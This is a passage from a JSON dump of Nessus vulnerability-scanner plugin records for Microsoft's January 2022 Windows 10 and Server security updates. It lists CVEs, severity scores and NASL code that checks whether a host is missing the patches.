CVE-2022-21858, CVE-2022-21859, CVE-2022-21860, CVE-2022-21861, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21865, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21869, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21882, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009557: Windows 10 Version 1809 and Windows Server 2019 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009557.NASL", "href": "https://www.tenable.com/plugins/nessus/156621", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156621);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21839\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009557\");\n script_xref(name:\"MSFT\", value:\"MS22-5009557\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009557: Windows 10 Version 1809 and Windows Server 2019 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009557.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21839,\n CVE-2022-21843, CVE-2022-21847, CVE-2022-21848,\n CVE-2022-21883, CVE-2022-21889, CVE-2022-21890,\n CVE-2022-21918)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21888, CVE-2022-21892,\n CVE-2022-21893, CVE-2022-21898, CVE-2022-21907,\n CVE-2022-21912, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21859, CVE-2022-21860,\n CVE-2022-21861, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21865, CVE-2022-21866,\n CVE-2022-21867, CVE-2022-21868, CVE-2022-21869,\n CVE-2022-21870, CVE-2022-21871, CVE-2022-21872,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21884,\n CVE-2022-21885, CVE-2022-21895, CVE-2022-21896,\n CVE-2022-21897, CVE-2022-21901, CVE-2022-21902,\n CVE-2022-21903, CVE-2022-21908, CVE-2022-21910,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21924,\n CVE-2022-21925)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009557\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009557.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009557');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009557])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:36", "description": "The Windows Server 2022 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009555: Windows Server 2022 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009555.NASL", "href": "https://www.tenable.com/plugins/nessus/156620", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156620);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009555\");\n script_xref(name:\"MSFT\", value:\"MS22-5009555\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009555: Windows Server 2022 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows Server 2022 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Server 2022 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009555\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009555 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009555');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'20348',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009555])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:55", "description": "The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009543.NASL", "href": "https://www.tenable.com/plugins/nessus/156617", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156617);\n script_version(\"1.11\");\n 